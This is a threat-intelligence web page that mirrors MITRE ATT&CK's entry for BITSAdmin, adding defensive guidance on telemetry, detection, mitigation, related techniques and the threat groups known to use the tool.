S0190: BITSAdmin

BITSAdmin matters because it is a legitimate Windows command-line tool that can create and manage BITS jobs, a Windows background transfer capability. Its defensive significance is not that the tool is inherently malicious, but that ATT&CK links it to BITS Jobs, ingress and lateral tool transfer, and exfiltration over unencrypted non-C2 protocols. For leaders, this is a classic “living off the land” coverage question: can the organization distinguish normal administrative or application-driven background transfers from suspicious use during an intrusion?

Executive priority

Prioritize BITSAdmin as a Windows monitoring and response-readiness issue rather than a standalone malware risk. Because multiple ATT&CK groups are related as using this tool and the related techniques span persistence, execution, command-and-control, lateral movement, and exfiltration, security leaders should ask whether SOC telemetry, incident response playbooks, and audit evidence cover BITS job creation and command-line use. The business decision value is in validating visibility and acceptable-use boundaries for native Windows utilities that may bypass tool-focused control strategies.

Technical view

For SOC, detection engineering, and IR teams, validate visibility around BITSAdmin execution and BITS job activity on Windows endpoints. ATT&CK provides no official detection text for this software object, so local detection should be anchored in the relationships: BITSAdmin can be associated with BITS Jobs (T1197), tool/file transfer from external systems (T1105), transfer between internal systems (T1570), and exfiltration over unencrypted non-C2 protocols (T1048.003). Review command-line telemetry, process ancestry, job metadata, user context, destination/source locations, and network activity. Tune carefully because legitimate Windows administration and application update behavior may also use BITS-related mechanisms.

Likely telemetry

Windows process creation events showing bitsadmin.exe execution and command-line arguments
Parent/child process context for BITSAdmin and related command shells or administrative tools
BITS job creation, modification, completion, and error records where available
Windows service and endpoint activity associated with Background Intelligent Transfer Service
Network connection and proxy/firewall logs for destinations contacted during BITS-related transfers

Detection direction

Inventory where BITSAdmin is expected to be used in the environment and alert on use outside those baselines.
Correlate BITSAdmin execution with BITS job activity, file writes, and network transfers rather than relying on process name alone.
Tune for suspicious context: unusual users, unusual hosts, unexpected parent processes, external destinations, internal staging paths, or timing inconsistent with normal administration.
Hunt for relationship-driven patterns: ingress tool transfer, lateral movement staging, persistence/execution via BITS jobs, and possible unencrypted non-C2 exfiltration.
Account for false positives from legitimate administrators, update mechanisms, and background transfer workflows.

Mitigation priorities

Define policy for legitimate BITSAdmin use on Windows systems and limit administrative use to approved roles and workflows.
Ensure endpoint logging captures process command lines and BITS-related activity sufficient for investigation.
Use least privilege and administrative access controls to reduce misuse of native transfer utilities.
Monitor and control outbound network paths so background transfer activity is visible through proxy, firewall, or equivalent network logging.
Include BITSAdmin and BITS Jobs in incident response triage checklists for Windows hosts involved in suspected transfer, persistence, or lateral movement activity.

Analyst notes and limits

The supplied ATT&CK record identifies BITSAdmin as a Windows command-line tool for creating and managing BITS Jobs. Its materiality comes from ATT&CK relationships to multiple techniques and several groups, not from any claim that BITSAdmin is malicious by itself. The group relationships show this tool appears in diverse threat contexts, including espionage and financially motivated activity, but local risk should be assessed against the organization’s Windows footprint, administrative practices, and telemetry maturity.

ATT&CK provides no official detection text for this object, no aliases, and no object-level tactics. Related technique descriptions include platforms beyond Windows, but the BITSAdmin software object itself is supplied as Windows-only. This take does not assert active exploitation, customer exposure, or detection coverage; those require local evidence.

Official MITRE ATT&CK definition

BITSAdmin

BITSAdmin is a command line tool used to create and manage BITS Jobs. [1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Filter related techniques 4 rows

Domain	ID	Name	Relationship / procedure
Enterprise	T1570	Lateral Tool Transfer	BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers.CitationMicrosoft About BITS
Enterprise	T1048.003	Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique	BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.CitationMicrosoft BITSAdmin
Enterprise	T1105	Ingress Tool Transfer	BITSAdmin can be used to create BITS Jobs to upload and/or download files.CitationMicrosoft BITSAdmin
Enterprise	T1197	BITS Jobs	BITSAdmin can be used to create BITS Jobs to launch a malicious process.CitationTrendMicro Tropic Trooper Mar 2018

Associated objects

Groups, software, and campaigns

G0102: Wizard Spider

Wizard Spider is a Russia-based financially motivated threat group originally known for the creation and deployment of TrickBot since at least 2016. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.[1][2][3]

G0096: APT41

APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.[1] Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[2][3]

G1034: Daggerfly

Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.[1][2][3][4]

G1001: HEXANE

HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.[1][2][3][4]

G1054: MirrorFace

MirrorFace is a People's Republic of China (PRC)-aligned cyberespionage actor believed to be a subgroup under the menuPass umbrella based on targeting, tools, and infrastructure overlaps. MirrorFace has been active since at least 2019, at first exclusively targeting Japanese organizations across the media, defense, diplomatic, financial, manufacturing, and academic sectors. Subsequent MirrorFace operations included targets in Central Europe and featured use of LODEINFO, HiddenFace, and UPPERCUT malware.[1][2][3][4][5][6]

G0065: Leviathan

Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.[1][2][3][4]

G1046: Storm-1811

Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.[1][2][3][4]

G0081: Tropic Trooper

Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.[1][2][3]

G0137: Ferocious Kitten

Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.[1]

Relationship explorer

All related ATT&CK context

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 1.5
Created: Apr 18, 2018, 17:59 UTC (UTC+00:00)
Modified: May 12, 2026, 15:12 UTC (UTC+00:00)
Raw hash: bbcd2b40f37d6925...

Imported snapshots across ATT&CK releases (1)

Release	Bundle imported	Object version	Modified	Status	Raw hash
19.1	May 18, 2026, 07:08 UTC (UTC+00:00)	1.5	May 12, 2026, 15:12 UTC (UTC+00:00)	Current bundle	`bbcd2b40f37d…`

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1]
Microsoft BITSAdmin

Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
Open source URL
[2]
mitre-attack S0190
Open source URL

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use

Analyst context for executives and security teams